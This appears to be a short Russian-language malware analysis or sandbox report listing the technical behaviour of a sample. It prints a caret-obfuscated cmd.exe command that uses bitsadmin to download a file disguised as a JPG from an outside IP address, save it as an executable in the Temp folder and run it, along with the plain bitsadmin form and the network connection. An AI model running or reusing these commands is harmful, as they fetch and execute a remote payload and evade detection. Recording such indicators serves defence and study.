Техническая информация
- '<SYSTEM32>\cmd.exe' /c b^i^ts^adm^i^n /transfe^r /dow^nlo^ad "http://80.82.67.217/poop.jpg" "%LOCALAPPDATA%\Temp/xALKo.exe" && "%LOCALAPPDATA%\Temp/xALKo.exe"
- '80.##.67.217':80
- '<SYSTEM32>\cmd.exe' /c b^i^ts^adm^i^n /transfe^r /dow^nlo^ad "http://80.82.67.217/poop.jpg" "%LOCALAPPDATA%\Temp/xALKo.exe" && "%LOCALAPPDATA%\Temp/xALKo.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://80.82.67.217/poop.jpg" "%LOCALAPPDATA%\Temp/xALKo.exe"